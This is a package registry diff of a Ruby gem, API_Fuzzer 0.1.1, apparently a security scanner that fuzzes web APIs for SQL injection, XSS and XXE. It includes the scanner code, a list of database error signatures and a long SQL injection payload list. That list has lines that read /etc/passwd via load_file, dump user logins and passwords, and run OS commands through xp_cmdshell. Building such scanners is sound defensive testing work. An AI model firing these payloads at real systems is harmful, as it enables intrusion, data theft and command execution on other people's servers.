API_Fuzzer 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/.gitignore +10 -0
- data/.travis.yml +5 -0
- data/API_Fuzzer.gemspec +31 -0
- data/CODE_OF_CONDUCT.md +49 -0
- data/Gemfile +11 -0
- data/LICENSE.txt +21 -0
- data/README.md +91 -0
- data/Rakefile +10 -0
- data/app/controllers/ping_controller.rb +22 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/config/routes.rb +4 -0
- data/lib/API_Fuzzer.rb +43 -0
- data/lib/API_Fuzzer/csrf_check.rb +41 -0
- data/lib/API_Fuzzer/engine.rb +5 -0
- data/lib/API_Fuzzer/error.rb +11 -0
- data/lib/API_Fuzzer/header_info.rb +50 -0
- data/lib/API_Fuzzer/idor_check.rb +62 -0
- data/lib/API_Fuzzer/privilege_escalation_check.rb +78 -0
- data/lib/API_Fuzzer/rate_limit_check.rb +69 -0
- data/lib/API_Fuzzer/redirect_check.rb +106 -0
- data/lib/API_Fuzzer/request.rb +69 -0
- data/lib/API_Fuzzer/resource_info.rb +51 -0
- data/lib/API_Fuzzer/sql_blind_check.rb +52 -0
- data/lib/API_Fuzzer/sql_check.rb +156 -0
- data/lib/API_Fuzzer/version.rb +3 -0
- data/lib/API_Fuzzer/vulnerability.rb +14 -0
- data/lib/API_Fuzzer/xss_check.rb +92 -0
- data/lib/API_Fuzzer/xxe_check.rb +47 -0
- data/payloads/blind_sql.txt +3 -0
- data/payloads/detect/sql.txt +89 -0
- data/payloads/sql.txt +196 -0
- data/payloads/xss.txt +58 -0
- data/rules/headers.yml +17 -0
- data/rules/info.yml +21 -0
- metadata +163 -0
@@ -0,0 +1,156 @@
|
|
1
|
+
require 'API_Fuzzer/vulnerability'
|
2
|
+
require 'API_Fuzzer/error'
|
3
|
+
require 'API_Fuzzer/request'
|
4
|
+
|
5
|
+
module API_Fuzzer
|
6
|
+
class InvalidURLError < StandardError; end
|
7
|
+
|
8
|
+
class SqlCheck
|
9
|
+
attr_accessor :parameters
|
10
|
+
attr_accessor :payloads, :sql_errors
|
11
|
+
|
12
|
+
ALLOWED_METHODS = [:get, :post].freeze
|
13
|
+
PAYLOAD_PATH = File.expand_path('../../../payloads/sql.txt', __FILE__)
|
14
|
+
DETECT_PATH = File.expand_path('../../../payloads/detect/sql.txt', __FILE__)
|
15
|
+
|
16
|
+
def self.scan(options = {})
|
17
|
+
@payloads = []
|
18
|
+
@sql_errors = []
|
19
|
+
fetch_payloads
|
20
|
+
@url = options[:url] || nil
|
21
|
+
raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
|
22
|
+
@params = options[:params] || {}
|
23
|
+
@cookies = options[:cookies] || {}
|
24
|
+
@json = options[:json] || false
|
25
|
+
@headers = options[:headers] || {}
|
26
|
+
@vulnerabilities = []
|
27
|
+
|
28
|
+
fuzz_payloads
|
29
|
+
return @vulnerabilities.uniq { |vuln| vuln.description }
|
30
|
+
rescue HTTP::ConnectionError => e
|
31
|
+
sleep(5)
|
32
|
+
fuzz_payloads
|
33
|
+
return @vulnerabilities.uniq { |vuln| vuln.description }
|
34
|
+
end
|
35
|
+
|
36
|
+
def self.fuzz_payloads
|
37
|
+
@payloads.each do |payload|
|
38
|
+
fuzz_each_payload(payload)
|
39
|
+
end
|
40
|
+
end
|
41
|
+
|
42
|
+
def self.fuzz_each_payload(payload)
|
43
|
+
uri = URI(@url)
|
44
|
+
path = uri.path
|
45
|
+
query = uri.query
|
46
|
+
base_uri = query.nil? ? path : [path, query].join("?")
|
47
|
+
fragments = base_uri.split(/[\/,?,&]/) - ['']
|
48
|
+
fragments.each do |fragment|
|
49
|
+
if fragment.match(/\A(\w)+=(\w)*\z/)
|
50
|
+
url = @url.gsub(fragment, [fragment, payload].join('')).chomp
|
51
|
+
fuzz_each_fragment(url, payload)
|
52
|
+
else
|
53
|
+
url = @url.gsub(fragment, payload).chomp
|
54
|
+
fuzz_each_fragment(url, payload)
|
55
|
+
end
|
56
|
+
end
|
57
|
+
|
58
|
+
return if @params.empty?
|
59
|
+
|
60
|
+
@params.keys.each do |parameter|
|
61
|
+
fuzz_each_parameter(parameter, payload)
|
62
|
+
end
|
63
|
+
end
|
64
|
+
|
65
|
+
def self.fuzz_each_fragment(url, payload)
|
66
|
+
ALLOWED_METHODS.each do |method|
|
67
|
+
begin
|
68
|
+
response = API_Fuzzer::Request.send_api_request(
|
69
|
+
url: url,
|
70
|
+
method: method,
|
71
|
+
cookies: @cookies,
|
72
|
+
headers: @headers
|
73
|
+
)
|
74
|
+
|
75
|
+
@vulnerabilities << API_Fuzzer::Error.new(description: "#{method} #{@url}", status: response.status, value: response.body) unless success?(response)
|
76
|
+
body = ''
|
77
|
+
if response_json?(response)
|
78
|
+
body = JSON.parse(response.body)
|
79
|
+
else
|
80
|
+
body = response.body
|
81
|
+
end
|
82
|
+
|
83
|
+
vulnerable = check_response?(body.to_s.downcase, payload)
|
84
|
+
next unless vulnerable
|
85
|
+
@vulnerabilities << API_Fuzzer::Vulnerability.new(
|
86
|
+
description: "Possible SQL injection in #{method} #{@url}",
|
87
|
+
parameter: "URL: #{url}",
|
88
|
+
value: "[PAYLOAD] #{payload}",
|
89
|
+
type: 'HIGH'
|
90
|
+
)
|
91
|
+
rescue Exception => e
|
92
|
+
puts e.message
|
93
|
+
end
|
94
|
+
end
|
95
|
+
end
|
96
|
+
|
97
|
+
def self.fuzz_each_parameter(parameter, payload)
|
98
|
+
@params[parameter] = payload
|
99
|
+
ALLOWED_METHODS.each do |method|
|
100
|
+
begin
|
101
|
+
response = API_Fuzzer::Request.send_api_request(
|
102
|
+
url: @url,
|
103
|
+
params: @params,
|
104
|
+
method: method,
|
105
|
+
cookies: @cookies,
|
106
|
+
headers: @headers
|
107
|
+
)
|
108
|
+
|
109
|
+
@vulnerabilities << API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body) unless success?(response)
|
110
|
+
body = response.body.to_s.downcase
|
111
|
+
vulnerable = check_response?(body, payload)
|
112
|
+
next unless vulnerable
|
113
|
+
|
114
|
+
@vulnerabilities << API_Fuzzer::Vulnerability.new(
|
115
|
+
description: "Possible SQL injection in #{method} #{@url} parameter: #{parameter}",
|
116
|
+
parameter: "parameter: #{@parameter}",
|
117
|
+
value: "[PAYLOAD] #{payload}",
|
118
|
+
type: 'HIGH'
|
119
|
+
)
|
120
|
+
rescue Exception => e
|
121
|
+
puts e.message
|
122
|
+
end
|
123
|
+
end
|
124
|
+
end
|
125
|
+
|
126
|
+
def self.check_response?(body, payload)
|
127
|
+
@sql_errors.each do |error|
|
128
|
+
if body.match(error.chomp)
|
129
|
+
puts error
|
130
|
+
return true
|
131
|
+
end
|
132
|
+
end
|
133
|
+
false
|
134
|
+
end
|
135
|
+
|
136
|
+
def self.success?(response)
|
137
|
+
response.code == 200
|
138
|
+
end
|
139
|
+
|
140
|
+
def self.response_json?(response)
|
141
|
+
response && response.headers['Content-Type'] && response.headers['Content-Type'].downcase =~ /application\/json/
|
142
|
+
end
|
143
|
+
|
144
|
+
def self.fetch_payloads
|
145
|
+
file = File.expand_path(PAYLOAD_PATH, __FILE__)
|
146
|
+
File.readlines(file).each do |line|
|
147
|
+
@payloads << line
|
148
|
+
end
|
149
|
+
|
150
|
+
file = File.expand_path(DETECT_PATH, __FILE__)
|
151
|
+
File.readlines(file).each do |line|
|
152
|
+
@sql_errors << line.downcase
|
153
|
+
end
|
154
|
+
end
|
155
|
+
end
|
156
|
+
end
|
@@ -0,0 +1,14 @@
|
|
1
|
+
module API_Fuzzer
|
2
|
+
|
3
|
+
class Vulnerability
|
4
|
+
attr_accessor :description, :value, :type, :parameter
|
5
|
+
|
6
|
+
def initialize(options = {})
|
7
|
+
@description = options[:description]
|
8
|
+
@parameter = options[:parameter]
|
9
|
+
@value = options[:value]
|
10
|
+
@type = options[:type]
|
11
|
+
end
|
12
|
+
end
|
13
|
+
|
14
|
+
end
|
@@ -0,0 +1,92 @@
|
|
1
|
+
require 'API_Fuzzer/vulnerability'
|
2
|
+
require 'API_Fuzzer/error'
|
3
|
+
require 'API_Fuzzer/request'
|
4
|
+
|
5
|
+
module API_Fuzzer
|
6
|
+
|
7
|
+
class InvalidURLError < StandardError; end
|
8
|
+
|
9
|
+
class XssCheck
|
10
|
+
attr_accessor :parameters
|
11
|
+
|
12
|
+
ALLOWED_METHODS = [:get, :post].freeze
|
13
|
+
PAYLOADS = []
|
14
|
+
PAYLOAD_PATH = File.expand_path('../../../payloads/xss.txt', __FILE__)
|
15
|
+
|
16
|
+
def self.scan(options = {})
|
17
|
+
@url = options[:url] || nil
|
18
|
+
raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
|
19
|
+
@params = options[:params] || {}
|
20
|
+
@cookies = options[:cookies] || {}
|
21
|
+
@headers = options[:headers] || {}
|
22
|
+
@json = options[:json] || false
|
23
|
+
@vulnerabilities = []
|
24
|
+
|
25
|
+
fetch_payloads
|
26
|
+
PAYLOADS.each do |payload|
|
27
|
+
fuzz_each_payload(payload)
|
28
|
+
end
|
29
|
+
@vulnerabilities.uniq { |vuln| vuln.description }
|
30
|
+
end
|
31
|
+
|
32
|
+
private
|
33
|
+
|
34
|
+
def self.fuzz_each_payload(payload)
|
35
|
+
@params.keys.each do |parameter|
|
36
|
+
fuzz_each_parameter(parameter, payload)
|
37
|
+
end
|
38
|
+
end
|
39
|
+
|
40
|
+
def self.fuzz_each_parameter(parameter, payload)
|
41
|
+
@params[parameter] = payload
|
42
|
+
|
43
|
+
ALLOWED_METHODS.each do |method|
|
44
|
+
response = API_Fuzzer::Request.send_api_request(
|
45
|
+
url: @url,
|
46
|
+
params: @params,
|
47
|
+
method: method,
|
48
|
+
cookies: @cookies,
|
49
|
+
headers: @headers
|
50
|
+
)
|
51
|
+
|
52
|
+
if response_json?(response)
|
53
|
+
body = JSON.parse(response.body)
|
54
|
+
else
|
55
|
+
vulnerable = check_response?(response.body, payload)
|
56
|
+
|
57
|
+
if success?(response)
|
58
|
+
@vulnerabilities << API_Fuzzer::Vulnerability.new(
|
59
|
+
description: "Possible XSS in #{method} #{@url} parameter: #{@parameter}",
|
60
|
+
value: "[PAYLOAD] #{payload}",
|
61
|
+
type: 'MEDIUM'
|
62
|
+
) if vulnerable
|
63
|
+
else
|
64
|
+
API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body)
|
65
|
+
end
|
66
|
+
end
|
67
|
+
end
|
68
|
+
end
|
69
|
+
|
70
|
+
def self.check_response?(body, payload)
|
71
|
+
if body.to_s.include?(payload)
|
72
|
+
return true
|
73
|
+
end
|
74
|
+
false
|
75
|
+
end
|
76
|
+
|
77
|
+
def self.success?(response)
|
78
|
+
response.code == 200
|
79
|
+
end
|
80
|
+
|
81
|
+
def self.response_json?(response)
|
82
|
+
response && response.headers['Content-Type'].downcase =~ /application\/json/
|
83
|
+
end
|
84
|
+
|
85
|
+
def self.fetch_payloads
|
86
|
+
file = File.expand_path(PAYLOAD_PATH, __FILE__)
|
87
|
+
File.readlines(file).each do |line|
|
88
|
+
PAYLOADS << line
|
89
|
+
end
|
90
|
+
end
|
91
|
+
end
|
92
|
+
end
|
@@ -0,0 +1,47 @@
|
|
1
|
+
require 'API_Fuzzer/vulnerability'
|
2
|
+
require 'API_Fuzzer/error'
|
3
|
+
require 'API_Fuzzer/request'
|
4
|
+
|
5
|
+
module API_Fuzzer
|
6
|
+
class XxeCheck
|
7
|
+
|
8
|
+
def self.scan(options = {})
|
9
|
+
@url = options[:url] || nil
|
10
|
+
@params = options[:params]
|
11
|
+
@scan_hash = options[:scan]
|
12
|
+
@cookies = options[:cookies] || {}
|
13
|
+
@headers = options[:headers] || {}
|
14
|
+
fuzz_xml_params
|
15
|
+
end
|
16
|
+
|
17
|
+
private
|
18
|
+
|
19
|
+
def self.fuzz_xml_params
|
20
|
+
return unless @params
|
21
|
+
body = params_serialize.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
|
22
|
+
payload = <<-XXEPAYLOAD
|
23
|
+
<?xml version="1.0" encoding="ISO-8859-1"?>
|
24
|
+
<!DOCTYPE foo [
|
25
|
+
<!ELEMENT foo ANY >
|
26
|
+
<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/ping/#{@scan_hash}" >]>
|
27
|
+
XXEPAYLOAD
|
28
|
+
payload << body
|
29
|
+
API_Fuzzer::Request.send_api_request(
|
30
|
+
url: @url,
|
31
|
+
params: payload,
|
32
|
+
body: true,
|
33
|
+
method: :post,
|
34
|
+
headers: @headers,
|
35
|
+
cookies: @cookies
|
36
|
+
)
|
37
|
+
end
|
38
|
+
|
39
|
+
def self.params_serialize
|
40
|
+
body = []
|
41
|
+
@params.keys.each do |key, value|
|
42
|
+
body << "#{key}=#{value}"
|
43
|
+
end
|
44
|
+
body.join('&')
|
45
|
+
end
|
46
|
+
end
|
47
|
+
end
|
@@ -0,0 +1,89 @@
|
|
1
|
+
</font><font face="Arial" size=2>
|
2
|
+
A syntax error has occurred
|
3
|
+
ADODB.Field error
|
4
|
+
ASP.NET is configured to show verbose error messages
|
5
|
+
ASP.NET_SessionId
|
6
|
+
Active Server Pages error
|
7
|
+
An illegal character has been found in the statement
|
8
|
+
An unexpected token "END-OF-STATEMENT" was found
|
9
|
+
CLI Driver
|
10
|
+
Can't connect to local
|
11
|
+
Custom Error Message
|
12
|
+
DB2 Driver
|
13
|
+
DB2 Error
|
14
|
+
DB2 ODBC
|
15
|
+
Died at
|
16
|
+
Disallowed Parent Path
|
17
|
+
Error Diagnostic Information
|
18
|
+
Error Message : Error loading required libraries.
|
19
|
+
Error Report
|
20
|
+
Error converting data type varchar to numeric
|
21
|
+
Fatal error
|
22
|
+
Incorrect syntax near
|
23
|
+
Index of
|
24
|
+
Internal Server Error
|
25
|
+
Invalid Path Character
|
26
|
+
Invalid procedure call or argument
|
27
|
+
Invision Power Board Database Error
|
28
|
+
JDBC Driver
|
29
|
+
JDBC Error
|
30
|
+
JDBC MySQL
|
31
|
+
JDBC Oracle
|
32
|
+
JDBC SQL
|
33
|
+
Microsoft OLE DB Provider for ODBC Drivers
|
34
|
+
Microsoft VBScript compilation error
|
35
|
+
Microsoft VBScript error
|
36
|
+
MySQL Driver
|
37
|
+
MySQL Error
|
38
|
+
MySQL ODBC
|
39
|
+
ODBC DB2
|
40
|
+
ODBC Driver
|
41
|
+
ODBC Error
|
42
|
+
ODBC Microsoft Access
|
43
|
+
ODBC Oracle
|
44
|
+
ODBC SQL
|
45
|
+
ODBC SQL Server
|
46
|
+
OLE/DB provider returned message
|
47
|
+
ORA-0
|
48
|
+
ORA-1
|
49
|
+
Oracle DB2
|
50
|
+
Oracle Driver
|
51
|
+
Oracle Error
|
52
|
+
Oracle ODBC
|
53
|
+
PHP Error
|
54
|
+
PHP Parse error
|
55
|
+
PHP Warning
|
56
|
+
Parent Directory
|
57
|
+
Permission denied: 'GetObject'
|
58
|
+
PostgreSQL query failed: ERROR: parser: parse error
|
59
|
+
SQL Server Driver
|
60
|
+
SQL Server
|
61
|
+
SQL command not properly ended
|
62
|
+
SQLException
|
63
|
+
Supplied argument is not a valid PostgreSQL result
|
64
|
+
Syntax error in query expression
|
65
|
+
The error occurred in
|
66
|
+
The script whose uid is
|
67
|
+
Type mismatch
|
68
|
+
Unable to jump to row
|
69
|
+
Unclosed quotation mark before the character string
|
70
|
+
Unterminated string constant
|
71
|
+
Warning: Cannot modify header information - headers already sent
|
72
|
+
Warning: Supplied argument is not a valid File-Handle resource in
|
73
|
+
Warning: mysql_query()
|
74
|
+
Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL
|
75
|
+
You have an error in your SQL syntax near
|
76
|
+
data source=
|
77
|
+
detected an internal error [IBM][CLI Driver][DB2/6000]
|
78
|
+
include_path
|
79
|
+
invalid query
|
80
|
+
is not allowed to access
|
81
|
+
mySQL error with query
|
82
|
+
mysql error
|
83
|
+
on MySQL result index
|
84
|
+
server object error
|
85
|
+
supplied argument is not a valid MySQL result resource
|
86
|
+
unexpected end of SQL command
|
87
|
+
MySQL server version
|
88
|
+
You have an error in your SQL syntax
|
89
|
+
SQL syntax
|
data/payloads/sql.txt
ADDED
@@ -0,0 +1,196 @@
|
|
1
|
+
'
|
2
|
+
' --
|
3
|
+
(
|
4
|
+
)
|
5
|
+
*|
|
6
|
+
*/*
|
7
|
+
&
|
8
|
+
0
|
9
|
+
031003000270000
|
10
|
+
0 or 1=1
|
11
|
+
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
12
|
+
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
|
13
|
+
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
14
|
+
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
|
15
|
+
1 or 1=1
|
16
|
+
1;SELECT%20*
|
17
|
+
1 waitfor delay '0:0:10'--
|
18
|
+
'%20or%20''='
|
19
|
+
'%20or%201=1
|
20
|
+
')%20or%20('x'='x
|
21
|
+
'%20or%20'x'='x
|
22
|
+
%20or%20x=x
|
23
|
+
%20'sleep%2050'
|
24
|
+
%20$(sleep%2050)
|
25
|
+
%21
|
26
|
+
23 OR 1=1
|
27
|
+
hi' or '1'='1'--
|
28
|
+
%26
|
29
|
+
%27%20or%201=1
|
30
|
+
%28
|
31
|
+
%29
|
32
|
+
%2A%28%7C%28mail%3D%2A%29%29
|
33
|
+
%2A%28%7C%28objectclass%3D%2A%29%29
|
34
|
+
%2A%7C
|
35
|
+
||6
|
36
|
+
'||'6
|
37
|
+
(||6)
|
38
|
+
%7C
|
39
|
+
a'
|
40
|
+
admin' or '
|
41
|
+
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
|
42
|
+
' and 1 in (select var from temp)--
|
43
|
+
anything' OR 'x'='x
|
44
|
+
"a"" or 1=1--"
|
45
|
+
a' or 1=1--
|
46
|
+
"a"" or 3=3--"
|
47
|
+
a' or 3=3--
|
48
|
+
a' or 'a' = 'a
|
49
|
+
'%20OR
|
50
|
+
as
|
51
|
+
asc
|
52
|
+
a' waitfor delay '0:0:10'--
|
53
|
+
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
54
|
+
bfilename
|
55
|
+
char%4039%41%2b%40SELECT
|
56
|
+
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
57
|
+
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
|
58
|
+
declare @q nvarchar (4000) select @q =
|
59
|
+
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
|
60
|
+
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
61
|
+
declare @s varchar(22) select @s =
|
62
|
+
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
|
63
|
+
delete
|
64
|
+
desc
|
65
|
+
distinct
|
66
|
+
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
67
|
+
'; exec master..xp_cmdshell
|
68
|
+
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
69
|
+
exec(@s)
|
70
|
+
'; exec ('sel' + 'ect us' + 'er')
|
71
|
+
exec sp
|
72
|
+
'; execute immediate 'sel' || 'ect us' || 'er'
|
73
|
+
exec xp
|
74
|
+
'; exec xp_regread
|
75
|
+
' group by userid having 1=1--
|
76
|
+
handler
|
77
|
+
having
|
78
|
+
' having 1=1--
|
79
|
+
hi or 1=1 --"
|
80
|
+
hi' or 1=1 --
|
81
|
+
"hi"") or (""a""=""a"
|
82
|
+
hi or a=a
|
83
|
+
hi' or 'a'='a
|
84
|
+
hi') or ('a'='a
|
85
|
+
'hi' or 'x'='x';
|
86
|
+
insert
|
87
|
+
like
|
88
|
+
limit
|
89
|
+
*(|(mail=*))
|
90
|
+
*(|(objectclass=*))
|
91
|
+
or
|
92
|
+
' or ''='
|
93
|
+
or 0=0 #"
|
94
|
+
' or 0=0 --
|
95
|
+
' or 0=0 #
|
96
|
+
" or 0=0 --
|
97
|
+
or 0=0 --
|
98
|
+
or 0=0 #
|
99
|
+
' or 1 --'
|
100
|
+
' or 1/*
|
101
|
+
; or '1'='1'
|
102
|
+
' or '1'='1
|
103
|
+
' or '1'='1'--
|
104
|
+
' or 1=1
|
105
|
+
' or 1=1 /*
|
106
|
+
' or 1=1--
|
107
|
+
' or 1=1--
|
108
|
+
'/**/or/**/1/**/=/**/1
|
109
|
+
‘ or 1=1 --
|
110
|
+
" or 1=1--
|
111
|
+
or 1=1
|
112
|
+
or 1=1--
|
113
|
+
or 1=1 or ""=
|
114
|
+
' or 1=1 or ''='
|
115
|
+
' or 1 in (select @@version)--
|
116
|
+
or%201=1
|
117
|
+
or%201=1 --
|
118
|
+
' or 2 > 1
|
119
|
+
' or 2 between 1 and 3
|
120
|
+
' or 3=3
|
121
|
+
‘ or 3=3 --
|
122
|
+
' or '7659'='7659
|
123
|
+
or a=a
|
124
|
+
or a = a
|
125
|
+
' or 'a'='a
|
126
|
+
' or a=a--
|
127
|
+
') or ('a'='a
|
128
|
+
" or "a"="a
|
129
|
+
) or (a=a
|
130
|
+
order by
|
131
|
+
' or (EXISTS)
|
132
|
+
or isNULL(1/0) /*
|
133
|
+
" or isNULL(1/0) /*
|
134
|
+
' or 'something' like 'some%'
|
135
|
+
' or 'something' = 'some'+'thing'
|
136
|
+
' or 'text' = n'text'
|
137
|
+
' or 'text' > 't'
|
138
|
+
' or uid like '%
|
139
|
+
' or uname like '%
|
140
|
+
' or 'unusual' = 'unusual'
|
141
|
+
' or userid like '%
|
142
|
+
' or user like '%
|
143
|
+
' or username like '%
|
144
|
+
' or username like char(37);
|
145
|
+
' or 'whatever' in ('whatever')
|
146
|
+
' -- &password=
|
147
|
+
password:*/=1--
|
148
|
+
PRINT
|
149
|
+
PRINT @@variable
|
150
|
+
procedure
|
151
|
+
replace
|
152
|
+
select
|
153
|
+
' select * from information_schema.tables--
|
154
|
+
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
|
155
|
+
' (select top 1
|
156
|
+
--sp_password
|
157
|
+
'sqlattempt1
|
158
|
+
(sqlattempt2)
|
159
|
+
'sqlvuln
|
160
|
+
'+sqlvuln
|
161
|
+
(sqlvuln)
|
162
|
+
sqlvuln;
|
163
|
+
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
164
|
+
to_timestamp_tz
|
165
|
+
truncate
|
166
|
+
tz_offset
|
167
|
+
' UNION ALL SELECT
|
168
|
+
' union all select @@version--
|
169
|
+
' union select
|
170
|
+
uni/**/on sel/**/ect
|
171
|
+
' UNION SELECT
|
172
|
+
' union select 1,load_file('/etc/passwd'),1,1,1;
|
173
|
+
) union select * from information_schema.tables;
|
174
|
+
' union select * from users where login = char(114,111,111,116);
|
175
|
+
update
|
176
|
+
'||UTL_HTTP.REQUEST
|
177
|
+
,@variable
|
178
|
+
@variable
|
179
|
+
@var select @var as var into temp end --
|
180
|
+
\x27UNION SELECT
|
181
|
+
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
182
|
+
x' AND email IS NULL; --
|
183
|
+
x' AND members.email IS NULL; --
|
184
|
+
x' AND userid IS NULL; --
|
185
|
+
x' or 1=1 or 'x'='y
|
186
|
+
x' OR full_name LIKE '%Bob%
|
187
|
+
ý or 1=1 --
|
188
|
+
1'1
|
189
|
+
1 exec sp_ (or exec xp_)
|
190
|
+
1 and 1=1
|
191
|
+
1' and 1=(select count(*) from tablenames); --
|
192
|
+
1 or 1=1
|
193
|
+
1' or '1'='1
|
194
|
+
1or1=1
|
195
|
+
1'or'1'='1
|
196
|
+
fake@ema'or'il.nl'='il.nl
|